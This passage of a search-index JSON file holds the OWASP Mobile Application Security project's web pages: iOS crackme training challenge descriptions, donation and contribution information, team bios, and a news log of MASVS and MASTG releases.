"},{"location":"crackmes/iOS/","title":"iOS Crackmes","text":""},{"location":"crackmes/iOS/#ios-uncrackable-l1","title":"iOS UnCrackable L1","text":"A secret string is hidden somewhere in this binary. Find a way to extract it. The app will give you a hint when started.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"crackmes/iOS/#ios-uncrackable-l2","title":"iOS UnCrackable L2","text":"This app holds a secret inside - and this time it won't be tampered with!
Hint: it is related to alcoholic beverages.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note 1: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
Note 2: Due to its anti-tampering mechanisms the app won't run correctly if the main executable is modified and/or re-signed.
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"donate/how_to_donate/","title":"How to Donate","text":"1. Make your Donation:
Click the button to make your donation directly in the official OWASP website:
Fill in the form and be sure to select the option \"Publicly list me as a supporter of OWASP Mobile Application Security\"
Make your Donation
2. Register your Donation Package (optional):
If your donation is above USD 500 you may opt-in for a Donation Package by registering it. We will then, together with the OWASP Foundation, verify and process it.
Register your Donation
"},{"location":"donate/packages/","title":"Donation Packages","text":"These types of public recognition shall be online no less than one year, or no less than the next major release, whichever is greater.
The Donation Packages have a maximum duration; once expired, the logos will be removed and the donator will still be listed as a supporter on the project website, GitHub, and in the printed and digital versions. This can be renewed anytime.
Good Samaritan (USD 500) Honorable Benefactor (USD 2,000 / 8 Available) God Mode Donator (USD 4,000 / 5 Available)
Please note that the OWASP Donation Policy has changed since 22-Sept-2020. All details can be found in OWASP Donations Policy page.
Contact us if you have any questions regarding your donation.
"}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"OWASP Mobile Application Security","text":""},{"location":"#our-mission","title":"Our MissionOWASP MASVSOWASP MASTGOWASP MAS Checklist","text":"\"Define the industry standard for mobile application security.\"The OWASP Mobile Application Security (MAS) flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MASTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.
Download the MASVS Download the MASTG Download the Checklist "},{"location":"#trusted-by","title":"Trusted By","text":"The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"#mas-advocates","title":"\ud83e\udd47 MAS Advocates","text":"
MAS Advocates are key industry adopters of the OWASP MASVS and MASTG who have invested a significant and consistent amount of resources to drive the project forward and ensure its continued success. This includes making consistent high-impact contributions and actively promoting the adoption and usage of the project. Learn more.
"},{"location":"contact/","title":"\ud83d\udcac Connect with Us","text":"You can follow and reach out to the OWASP MAS team in many ways.
If you'd like to contribute, take a look at our Contributions page or reach out to the project leaders Carlos or Sven.
Request an invitation to join our Slack channel #project-mobile-app-security
Carlos is a mobile security research engineer who has gained many years of hands-on experience in the field of security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"contact/#sven-schleier","title":"Sven Schleier","text":"
Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to \"build security in\". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
"},{"location":"contributing/","title":"Contributing to the MAS Project","text":"
First of all, \u2b50 Give us a Star in GitHub!
The MAS project is an open source effort and we welcome all kinds of contributions and feedback.
Help us improve & join our community:
Contribute with content:
Before you start contributing, please check our pages \"How Can You Contribute?\" and \"Getting Started\". If you have any doubts please contact us.
"},{"location":"contributing/#what-not-to-do","title":"\ud83d\udeab What not to do","text":"Although we greatly appreciate any and all contributions to the project, there are a few things that you should take into consideration:
Please be sure to take a careful look at our Code of Conduct for all the details and ask us in case of doubt.
"},{"location":"contributing/#our-contributors","title":"Our Contributors","text":"All of our contributors are listed in GitHub repos. See OWASP MASTG Authors & Co-Authors, MASTG Contributors and MASVS Contributors.
Update March 2023: We're creating a new concept for contributions that aligns with the new MASTG v2 workflows. Stay tuned...
"},{"location":"contributing/#owasp-mas-project-featured-contributions","title":"OWASP MAS Project Featured Contributions","text":"Coming soon...
"},{"location":"contributing/#owasp-mastg-v2","title":"OWASP MASTG V2","text":"Coming soon...
"},{"location":"contributing/#owasp-masvs-v1","title":"OWASP MASVS V1","text":"The latest version of the MASVS v1 including all translations is available here: https://github.com/OWASP/owasp-masvs/releases/tag/v1.5.0
Project Lead Lead Author Contributors and Reviewers Sven Schleier and Carlos Holguera Bernhard Mueller, Sven Schleier, Jeroen Willemsen and Carlos Holguera Alexander Antukh, Mesheryakov Aleksey, Elderov Ali, Bachevsky Artem, Jeroen Beckers, Jon-Anthoney de Boer, Ben Cheney, Will Chilcutt, Stephen Corbiaux, Ratchenko Denis, Ryan Dewhurst, @empty_jack, Ben Gardiner, Manuel Delgado, Anton Glezman, Josh Grossman, Sjoerd Langkemper, Vin\u00edcius Henrique Marangoni, Martin Marsicano, Roberto Martelloni, @PierrickV, Julia Potapenko, Andrew Orobator, Mehrad Rafii, Javier Ruiz, Abhinav Sejpal, Stefaan Seys, Yogesh Sharma, Prabhant Singh, Nikhil Soni, Anant Shrivastava, Francesco Stillavato, Abdessamad Temmar, Pauchard Thomas, Lukasz Wierzbicki Language Translators & Reviewers Brazilian Portuguese Mateus Polastro, Humberto Junior, Rodrigo Araujo, Maur\u00edcio Ariza, Fernando Galves Chinese (Traditonal) Peter Chi, Lex Chien, Henry Hu, Leo Wang Chinese (Simplified) Bob Peng, Harold Zang, Jack S French Romuald Szkudlarek, Abderrahmane Aftahi, Christian Dong (Review) German Rocco Gr\u00e4nitz, Sven Schleier (Review) Hindi Mukesh Sharma, Ritesh Kumar, Kunwar Atul Singh, Parag Dave, Devendra Kumar Sinha, Vikrant Shah Japanese Koki Takeyama, Riotaro Okada (Review) Korean Youngjae Jeon, Jeongwon Cho, Jiyou Han, Jiyeon Sung Persian Hamed Salimian, Ramin Atefinia, Dorna Azhirak, Bardiya Akbari, Mahsa Omidvar, Alireza Mazhari, Milad Khoshdel Portuguese Ana Filipa Mota, Fernando Nogueira, Filipa Gomes, Luis Fontes, S\u00f3nia Dias Russian Gall Maxim, Eugen Martynov, Chelnokov Vladislav, Oprya Egor, Tereshin Dmitry Spanish Martin Marsicano, Carlos Holguera Turkish An\u0131l Ba\u015f, Haktan Emik Greek Panagiotis Yialouris"},{"location":"contributing/#owasp-mastg-v1","title":"OWASP MASTG V1","text":"The latest version of the MASTG v1 is available here: https://github.com/OWASP/owasp-mastg/releases/tag/v1.5.0
Note: This contributor table is generated based on our GitHub contribution statistics. For more information on these stats, see the GitHub Repository README. We manually update the table, so be patient if you're not listed immediately.
We thank our donators for providing the funds to support us on our project activities.
The OWASP Foundation is very grateful for the support by the individuals and organizations listed. However please note, the OWASP Foundation is strictly vendor neutral and does not endorse any of its supporters. Donations do not influence the content of the MASVS or MASTG in any way.
While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes a little bit of outside help is required.
Monetary Donations: You can donate any amount you like, no matter how small, anyone can help. From 500$ up you may select a Donation Package and be listed as a donator.
100% of the funds go to the OWASP Foundation and allow us funding our project activities such as contracting technical editors, graphic designers, software developers, purchasing test devices, creating swag, etc.
Donate Purchase the MASTG
Effort Based: You can instead support the project by contributing with your work and end up at our acknowledgement section.
If you're a company, consider becoming a \"MAS Advocate\" which is the highest status that companies can achieve in the project acknowledging that they've gone above and beyond to support the project.
Contribute Become a MAS Advocate
"},{"location":"news/","title":"\ud83d\uddde News","text":"Tip: Follow us on Twitter!
Follow @OWASP_MAS to get the latest updates instantly.
"},{"location":"news/#feb-19th-2024-new-standard-for-secure-mobile-app-transactions-based-on-the-owasp-masvs-by-the-cyber-security-agency-of-singapore","title":"Feb 19th, 2024: New Standard for Secure Mobile App Transactions based on the OWASP MASVS by the Cyber Security Agency of Singapore","text":"The Cyber Security Agency of Singapore (CSA) launched the \"Safe App Standard\" on January 10, 2024. Tailored for local app developers and service providers, this guideline is based on the OWASP Mobile Application Security Verification Standard (MASVS) and focuses on critical areas such as authentication and authorization (MASVS-AUTH), data storage (MASVS-STORAGE), and tamper resistance (MASVS-RESILIENCE). The initiative aims to protect apps from common cyber threats and ensure a safer digital space for users.
While the Safe App Standard is a significant step forward in securing mobile applications, developers are encouraged to consider the full MASVS and select the appropriate MAS profiles for comprehensive protection. This holistic approach to app security ensures that apps go beyond meeting the baseline and are protected against a wider range of cyber threats, providing robust security for end users.
"},{"location":"news/#jan-18th-2024-masvs-v210-release-masvs-privacy","title":"Jan 18th, 2024: MASVS v2.1.0 Release & MASVS-PRIVACY","text":"
We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.1.0 including the new MASVS-PRIVACY category and CycloneDX support.
"},{"location":"news/#masvs-privacy","title":"MASVS-PRIVACY","text":"After collecting and processing all feedback from the MASVS-PRIVACY Proposal we're releasing the new MASVS-PRIVACY category.
The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
The new controls are:
The MASVS is now available in CycloneDX format (OWASP_MASVS.cdx.json), a widely adopted standard for software bill of materials (SBOM). This format enables easier integration and automation within DevOps pipelines, improving visibility and management of mobile app security. By using CycloneDX, developers and security teams can more efficiently assess, track and comply with MASVS requirements, resulting in more secure mobile applications.
"},{"location":"news/#jan-11th-2024-mobile-application-risk-scoring-qa","title":"Jan 11th, 2024: Mobile Application Risk Scoring Q&A","text":"We've received many comments and excellent questions, which we've compiled and summarized, along with the authors' answers. We'd like to thank everyone who took the time to read the document and especially those who asked valuable questions.
See Mobile Application Risk Scoring Q&A
"},{"location":"news/#oct-10th-2023-masvs-privacy","title":"Oct 10th, 2023: MASVS-PRIVACY","text":"Mobile applications frequently access sensitive user data to deliver their core functionalities. This data ranges from personally identifiable information (PII), health metrics, location data, to device identifiers. Mobile devices are a constant companion to users, always connected, and equipped with numerous sensors\u2014including cameras, microphones, GPS and BLE\u2014that generate data capable of inferring user behavior and even identifying individuals. The landscape is further complicated by advanced tracking techniques, the integration of third-party SDKs, and a heightened awareness of privacy issues among users and regulators. As a response, there's a growing trend towards on-device processing to keep user data localized and more secure.
Today we're excited to announce the release of the new MASVS-PRIVACY, a new MASVS category and MAS profile with focus on privacy. The new profile is designed to help organizations and individuals assess the privacy implications of their mobile applications and make informed decisions.
The new controls are:
The proposal defines the scope of the new MASVS-PRIVACY category and profile, and includes a detailed description of each control, a rationale, and a list of tests. The new profile MAS-P, establishes a baseline for privacy and is intended to work cohesively, and in some cases even overlap, with other OWASP MAS profiles, such as MAS-L1 and MAS-L2, ensuring a holistic approach to both security and privacy.
Call to Action:
We'd be thrilled to hear what you think! Your input is really important to us, and it can make a big difference in shaping the final version of the document. Please take a moment to review it and share your comments, feedback, and ideas.
Review Timeline: until November 30, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1jq7V9cRureRFF_XT7d_Z9H_SLsaFs43cE50k6zMRu0Q/edit?usp=sharing
"},{"location":"news/#sept-29th-2023-mastg-refactor-part-2-techniques-tools-reference-apps","title":"Sept 29th, 2023: MASTG Refactor Part 2 - Techniques, Tools & Reference Apps","text":"We are thrilled to announce the second phase of the MASTG (Mobile Application Security Testing Guide) refactor. These changes aim to enhance the usability and accessibility of the MASTG.
The primary focus of this new refactor is the reorganization of the MASTG content into different components, each housed in its dedicated section/folder and existing now as individual pages in our website (markdown files with metadata/frontmatter in GitHub):
Tests:
tests/
folder.MASTG-TEST-XXXX
.Techniques:
techniques/
folder.MASTG-TECH-XXXX
.Tools:
tools/
folder.MASTG-TOOL-XXXX
.Apps:
apps/
folder.MASTG-APP-XXXX
.We hope that the revamped structure enables you to navigate the MASTG more efficiently and access the information you need with ease.
"},{"location":"news/#sep-20th-2023-request-for-community-review-new-risk-assessment-formula-for-mobile-applications","title":"Sep 20th, 2023: Request for Community Review: New Risk Assessment Formula for Mobile Applications","text":"We are excited to announce the release of a new collaborative effort between industry, academia, and the OWASP Mobile Application Security (MAS) project. This document introduces a novel formula designed to measure the risk associated with mobile applications.
Document Highlights:
Call to Action:
We invite you to review the document and share your comments, feedback, and suggestions. Your insights are invaluable to us and will contribute significantly to the final version.
Review Timeline: until October 31, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1dnjXoHpVL5YmZTqVEC9b9JOfu6EzQiizZAHVAeDoIlo/edit?usp=sharing
By collaborating on this initiative, we aim to provide a structured and flexible framework for risk assessment that assists organizations and individuals in making informed security decisions. We look forward to your active participation and valuable feedback!
"},{"location":"news/#jul-28th-2023-mas-testing-profiles-and-mastg-atomic-tests-paving-the-way-for-next-level-mobile-application-security","title":"Jul 28th, 2023: MAS Testing Profiles and MASTG Atomic Tests - Paving the Way for Next-Level Mobile Application Security","text":"The MASTG refactoring is a significant upgrade that addresses some existing challenges and introduces exciting new features. It aims to streamline compliance, simplify testing and improve usability for security testers and other stakeholders.
"},{"location":"news/#mas-testing-profiles","title":"MAS Testing Profiles","text":"As part of the MASVS refactoring, we've replaced the three traditional verification levels (L1, L2, and R) with security testing profiles in the MASTG. These new profiles are designed to enhance our ability to capture various security nuances associated with mobile apps, allowing us to evaluate different situations for the same MASVS control. For instance, in MASVS-STORAGE-1, it's acceptable to store data unencrypted in app internal storage for MAS-L1, but MAS-L2 requires data encryption.
The new MAS Testing Profiles include revamped versions of the traditional levels and one new addition:
Another interesting addition we're exploring for the near future is a 'Privacy' profile, which would focus on tests that consider the privacy implications of various app features and functionalities. We believe that this profile can become an essential tool in an era where privacy has become a significant concern.
HELP WANTED: Today we're releasing the new MAS Testing Profiles and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#atomic-tests","title":"Atomic Tests","text":"One of the key changes in the MASTG refactoring is the introduction of the new MASTG Atomic Tests. The existing tests are currently quite large and often cover more than one MASVS control. With the introduction of Atomic Tests, we'll break these tests down into smaller, more manageable pieces. Our goal is to make these tests as self-contained and specific as possible to allow for reduced ambiguity, better understanding and easier execution. Each atomic test will have its unique ID for easy reference and traceability and will be mapped to the relevant controls from the MASVS.
But before we can start writing the new atomic tests, we need to finalize the proposal for the new MASTG Atomic Tests including mappings to the MASVS controls and the new MAS Testing profiles.
HELP WANTED: Today we're releasing the new MASTG Atomic Tests Proposal and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#whats-next","title":"What's Next?","text":"We are now in the process of transforming the MASTG, according to the changes highlighted above. We've already released the MASVS v2.0.0, and the rest of the year will be dedicated to the MASTG refactoring, which will involve creating hundreds of new tests. We believe these changes will significantly improve the usability and relevance of the MASTG. We're excited to keep you updated on our progress and look forward to your continued support and feedback.
We would like to extend a special thanks to our MAS Advocate NowSecure. Their commitment to the OWASP project is not merely financial; it\u2019s an investment of their most valuable resource \u2013 their people and their time. NowSecure has dedicated hours of expertise, extensive knowledge, and hard work towards making these changes a reality.
Would you like to become a MAS Advocate? Contact us to learn more.
A huge thanks goes of course to our wider community and all of our contributors. Your continuous participation and input have been instrumental in the evolution of the OWASP MAS project. It is through this collaborative effort that we can truly advance in the field of mobile app security. Thank you for being a part of this journey!
"},{"location":"news/#may-8th-2023-masvs-v2-colors","title":"May 8th, 2023: MASVS v2 Colors","text":"We're bringing official colors to the MASVS! The new colors will be used across the MASVS v2.0.0 and MASTG v2.0.0 to help users quickly identify the different control groups. We've also revamped certain areas of our website to make them more readable and easier to navigate as well as to prepare for what's coming with the MASTG v2.0.0 (keyword: \"atomic tests\").
"},{"location":"news/#masvs","title":"MASVS","text":"
In the MASVS home page, the new colors will be used to highlight the different control groups.
The individual controls will also be color-coded to help users quickly identify the different control groups. We've also redesigned the control pages to make them more readable and easier to navigate.
"},{"location":"news/#mastg","title":"MASTG","text":"
Now, when you navigate to the MASTG tests, you'll see that they are categorized by platform (Android/iOS) as well as by MASVS category, also using our new colors in the sidebar. The colors will also be used to highlight the different control groups in the test description.
Each test now contains a header section indicating the platform, the MASVS v1.5.0 controls, and the MASVS v2.0.0 controls.
We've also introduced a new section called \"Resources\" which is automatically generated using the inline links within the MASTG pages and serve as a quick reference to the most important resources for each test.
NOTE: The MASTG tests themselves haven't changed yet, we're still working on the refactoring. For now we've simply split the tests into individual pages to make them easier to navigate and reference. This will facilitate the work on the refactoring and the introduction of the new atomic tests.
"},{"location":"news/#mas-checklist","title":"MAS Checklist","text":"The MAS Checklist pages and the MAS checklist itself have also been updated to use the new colors to highlight the different control groups and to make them easier to navigate.
When you click on a MASVS group you'll see a table listing the new MASVS v2.0.0 controls as well as the corresponding MASTG tests (v1.5.0) for both the Android and the iOS platforms.
NOTE: The checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
We hope you like the new colors and the changes we've made to the website. We're looking forward to your feedback! Please use our GitHub Discussions to post any questions or ideas you might have. If you see something wrong please let us know by opening a bug issue.
"},{"location":"news/#april-1st-2023-masvs-v200-release","title":"April 1st, 2023: MASVS v2.0.0 Release","text":"We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.0.0. With this update, we have set out to achieve several key objectives to ensure that MASVS remains a leading industry standard for mobile application security.
We believe that these changes will make the OWASP MASVS v2.0.0 an even more valuable resource for developers and security practitioners alike, and we are excited to see how the industry embraces these updates.
The MASVS v2.0.0 was presented at the OWASP AppSec Dublin 2023, you can watch the presentation \u25b6\ufe0f here.
"},{"location":"news/#why-are-there-no-levels-in-the-new-masvs-controls","title":"Why are there no levels in the new MASVS controls?","text":"The Levels you already know (L1, L2 and R) will be fully reviewed and backed up with a corrected and well-documented threat model.
Enter MAS Profiles: We are moving the levels to the MASTG tests so that we can evaluate different situations for the same control (e.g., in MASVS-STORAGE-1, it's OK to store data unencrypted in app internal storage for L1, but L2 requires data encryption). This can lead to different tests depending on the security profile of the application.
"},{"location":"news/#transition-phase","title":"Transition Phase","text":"The MASTG, in its current version v1.5.0, currently still supports the MASVS v1.5.0. Bringing the MASTG to v2.0.0 to be fully compatible with MASVS v2.0.0 will take some time. That's why we need to introduce a \"transition phase\". We're currently mapping all new proposed test cases to the new profiles (at least L1 and L2), so even if the MASTG refactoring is not complete, you'll know what to test for, and you'll be able to find most of the tests already in the MASTG.
We thank everyone that has participated in the MASVS Refactoring. You can access all Discussion and documents for the refactoring here.
You'll notice that we have one new author in the MASVS: Jeroen Beckers
Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
\ud83d\udc99 Special thanks to our MAS Advocate, NowSecure, who has once again demonstrated their commitment to the project by continuously supporting it with time/dedicated resources as well as feedback, data and content contributions.
"},{"location":"news/#august-23rd-2022-project-rebranding-to-owasp-mas","title":"August 23rd, 2022: Project Rebranding to OWASP MAS","text":"
Until now our project was called the \"OWASP Mobile Security Testing Guide (MSTG)\" project. Unfortunately, this was a source of confusion since we happen to have a resource with the same name, the OWASP MSTG. Not only that, that name doesn't reflect the full scope and reach of our project. Have you ever wondered why the MSTG is called MSTG and not MASTG? Both documents are about Mobile Application Security and we'd like to make that clear.
Today we are rebranding our project to \u201cOWASP Mobile App Security (MAS)\u201d. The OWASP MAS project includes:
We see MAS reflecting all the consistency, structure and transparency that we\u2019re bringing with our 2.0 versions.
The rebranding will happen gradually so expect changes to be rolled out over the upcoming days/weeks.
"},{"location":"news/#february-7th-2022-nist-800-218-recommendations-for-mitigating-the-risk-of-software-vulnerabilities","title":"February 7th, 2022: NIST 800-218 - Recommendations for Mitigating the Risk of Software Vulnerabilities","text":"We're happy to share the new NIST 800-218 (Feb 2022) mapping to the latest MASVS v1.4.2 (Jan 2022) especially MASVS-ARCH and MASVS-CODE:
\"Secure Software Development Framework (SSDF) v1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities\"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
"},{"location":"news/#november-17th-2021-from-slack-to-github-discussions","title":"November 17th, 2021: From Slack to GitHub Discussions","text":"Hello everyone,
times change, our project evolves and being able to hear you and discuss with you all is key for the OWASP MSTG project.
TL;DR: we deprecate Slack in favor of GitHub Discussions as our primary communication channel.
https://github.com/OWASP/owasp-mastg/discussions/ https://github.com/OWASP/owasp-masvs/discussions/
"},{"location":"news/#removing-obstacles","title":"Removing obstacles","text":"Until now we've driven all discussion on the MSTG Slack channel, to participate you had to get Slack, find the invite link (hope that it's still valid, else report it), go to our channel and post your question. It could really be a hurdle some times and some questions might be missed, there was also no way to up-vote them or keep track.
All our contributors do have a GitHub account (or should! now you have a reason :) ). So, from today on we move to GitHub discussions and deprecate Slack as the primary communication channel. You can still reach us there for private messages though and we will try to relay the discussions to Slack ASAP, but just as notifications (no Q&A over there).
Discussions provides a place to bring all those conversations together right next to your code. Whether it\u2019s asking questions, sharing announcements, or featuring important information, it\u2019s all in one place and easily accessible to contributors and community members alike.
"},{"location":"news/#separation","title":"Separation","text":"We want a separation between actionable things to do (issues) and ideas/proposals (now \"Ideas\" Discussion). Having it all in GitHub makes it sooo much easier for us to manage, reference, etc.
Think of it this way: Discussions are for talking and GitHub Issues are for doing. This helps minimize distractions, keep teams on track, and address topics and questions clearly in a dedicated forum. Plus, you can move seamlessly between the two as well by converting an issue to a discussion and vice versa with a simple click.
"},{"location":"news/#insights","title":"Insights","text":"Soon we will be able to see insights regarding the discussions. You guessed it, we'll take that into account and acknowledge your contribution to the discussions as we do with the content itself. More details on this once we can test the feature.
"},{"location":"news/#roadmap","title":"Roadmap","text":"or:
For this announcement we partially mapped this nice GitHub article to our project (recommended read): https://github.blog/2021-11-10-7-unique-software-collaboration-features-in-github-discussions/
"},{"location":"news/#may-23rd-2020-new-build-system-and-release-upcoming","title":"May 23rd 2020: New build system and release upcoming!","text":"As already shared during the virtual Dutch Chapter meetup: we are going to release a new version of the MSTG soon. We have been quite busy with moving it to the new build system first as the document got too large for our old tooling. This is a great incentive as well to think of how we can make the guide more focused so that the size does not matter ;-)
More news on the new release will follow soon...
"},{"location":"news/#april-10th-2020-stayhome-and-share-your-knowledge","title":"April 10th 2020: #StayHome and share your knowledge!","text":"Hi everybody,
we are all in more or less restrictive lock-down situations, but the guideline is always #StayHome. This is definitely a challenging time for you, but also us. But luckily it was also never easier to collaborate and share, through so many different tools and platforms.
The OWASP Mobile Security Testing Guide (MSTG) project team wants to encourage people to #StayHome and also use this time to share your knowledge with the community. So if you want to either share your knowledge in mobile security or are just keen in doing some research in this area, we have many open issues where we are still looking for volunteers.
If you can close 5 issues that we marked with the tag #StayHome we will sent you in return a hard copy of the OWASP MSTG! We are giving away a total of 5 books on a first come first serve basis.
If you are interested, do the following:
Go through the open issues in our Github repo with the tag #StayHome.
Make a comment on the issue that you would like to take care of, which will be assigned on a first come first serve basis. For any clarifications you can ping either Carlos or Sven in OWASP Slack. If you don't have an account yet, please check here on how to register.
Work on the issue and create a Pull Request (PR). If you are new to Git(hub), check out our contribution guide for further details.
We will review the PR and merge once all comments are addressed/resolved.
Start at 1. :-)
We would love to have you as a contributor. Feel free to share the mail or like our tweet
Stay safe, take care and #StayHome!
Sven, Jeroen and Carlos
"},{"location":"news/#march-17th-2020-international-release-of-masvs-12","title":"March 17th, 2020: International release of MASVS 1.2","text":"A new version of the OWASP Mobile Application Security Verification Standard (MASVS) was released! The MASVS establishes baseline security requirements for mobile apps and summarizes them in one standard. With this new release we achieved a significant alignment and coverage with existing mobile security documents from ENISA, older NIST documents, OWASP Mobile top 10, and others. The new version 1.2 is available in Github Releases: https://github.com/OWASP/owasp-masvs/releases/tag/v1.2. For more details please look into our Release Notes for Version 1.2 and Version 1.2-RC https://github.com/OWASP/owasp-mastg/releases/tag/v1.2.
Thanks to the great support of our community we have now 9 different languages available in total for the MASVS and would like to thank all of our translators for their great work and support throughout:
The MASVS and its translations are available in PDF, Mobile, ePub, docx and you can also read it via Gitbook. See here for details: https://github.com/OWASP/owasp-masvs/releases
The project team (Sven Schleier, Jeroen Willemsen and Carlos Holguera) would like to thank all the contributors, translators and those who build the improved automation around it and all their hard work and support in the last few months! New releases will be much faster thanks to our GitHub actions and Docker containers. Next to that, we are happy to add Korean and Chinese Simplified to our ever growing list of translations! We will finalize the document generation system and then apply the same build system to the Mobile Security Testing Guide (MSTG) in order to speed up the release process and release more frequently.
"},{"location":"news/#october-4th-2019-pre-release-of-masvs-12","title":"October 4th, 2019: Pre-release of MASVS 1.2!","text":"We have a pre-release of MASVS Version 1.2. This will be the reference document for further translations.
"},{"location":"news/#october-2nd-2019-mstg-playground-release","title":"October 2nd, 2019: MSTG Playground Release!","text":"Want more training apps? We hear you! We just released the MSTG-Android-Java & MSTG-Android-Kotlin for Android and the MSTG-JWT app for iOS. Come and check it out at the release page! With special thanks to Sven Schleier (@sushi2k), Wen Bin Kong (@kongwenbin), Nikhil Soni (@nikhil), and Ryan Teoh (@ryantzj).
"},{"location":"news/#october-2nd-2019-mstg-project-joins-hacktoberfest","title":"October 2nd, 2019: MSTG Project joins Hacktoberfest!","text":"We are joining the #hacktoberfest October 2-31. Check out our issues at Github. Register at https://hacktoberfest.digitalocean.com.
"},{"location":"news/#september-17th-2019-xamarin-experiment","title":"September 17th, 2019: Xamarin experiment!","text":"We have launched a Xamarin experiment based on our compliance checklist. Want to teach others how to validate Xamarin apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-flutter-experiment","title":"September 6th, 2019: Flutter experiment!","text":"We have launched a Flutter experiment based on our compliance checklist. Want to teach others how to validate Flutter apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-react-native-experiment","title":"September 6th, 2019: React native experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#august-29th-2019-carlos-holguera-joins-the-leader-team","title":"August 29th, 2019: Carlos Holguera joins the leader team","text":"We are happy to announce that Carlos Holguera joins us as an official MSTG Author and co-leader! With a team of 3 we hope to march further as that would make our lives easier given that all of this hard work is done by volunteers!
"},{"location":"news/#august-4th-2019-oss-release","title":"August 4th, 2019: OSS Release!","text":"After a lot of work, we finally have a new release of the MSTG! Want to know more? Head over to the Github release page.
"},{"location":"news/#august-2nd-2019-project-promoted-to-flagship-status","title":"August 2nd, 2019: Project promoted to Flagship status!","text":"We have been awarded Flagship status! We are very grateful and excited about this! We could not have done this without our team of awesome volunteers that have committed to the project, wrote issues, and supported us in many other ways. A special thanks goes out to OWASP and especially Harold Blankenship for facilitating us to function as a project and for leading the project review at OWASP Appsec Tel-Aviv! Thank you!
"},{"location":"news/#june-5th-2019-new-release-of-the-masvs","title":"June 5th, 2019: New release of the MASVS","text":"As the summit is progressing, so are we! We have just released a new version of the MASVS (1.1.4). Want to know more? Head over to the Github release page!
"},{"location":"news/#may-21nd-2019-new-release-of-the-mstg","title":"May 21st, 2019: New release of the MSTG","text":"As part of the preparations for the Open Security Summit, we have released a new version of the MSTG. Want to know more? Head over to the Github release page!
"},{"location":"news/#may-7th-2019-new-release-of-the-mstg","title":"May 7th, 2019: New release of the MSTG","text":"After many changes, we decided it was time to create a new release in order to improve the book version! Want to know more? Head over to the Github release page.
"},{"location":"news/#april-15th-2019-book-version-project-promotion-preparation-for-the-summit","title":"April 15th, 2019: Book version, project promotion & preparation for the summit","text":"Given that most news is already shared via OWASP Slack over the last quarter, we still see that it is good to share a summary of all of the good things outside of Slack using this news section. In this update we have a lot to share! While we started off this year with an improved version of the MASVS and MSTG, things have not been quiet: there has been a huge development in master of the MSTG and many issues have been raised and fixed. In the meantime, we have worked on an actual print of the book! While an early version is available through Hulu (no link supplied, google and buy at your own risk), we are working on making a better version of that book. In the mean time we have filed for a project promotion to Flagship! Next a lot more cool things happened: with the now official publication of NIST Special Publication (SP) 800-163 Revision 1, the MASVS and MSTG are getting more mainstream ;-). The MASVS & MSTG are mentioned in various other upcoming programs/standards/recommendations as well, which is really a recognition of the hard work put in by the community. We are proud to be part of such a great project! Next, we are preparing to join the Open Security Summit again! Already three people will be on site, and at least one remote, but we would love to work with more people at the project again! Want to know more? Please get in touch via Slack and join the #project-mobile-app-security channel or follow us on Twitter.
"},{"location":"news/#january-15th-2019-release-of-improved-checklist","title":"January 15th, 2019: Release of improved checklist","text":"We released a new version of the checklist! This version has adaptable references so that it can be used with newer versions of the MSTG as well. This version is currently available in French and English and we hope to add the Russian, Japanese, German and Spanish version soon! Want to know more? Take a look at our release page!. We would like to thank our volunteers for their effort to deliver these easy to use checklists!
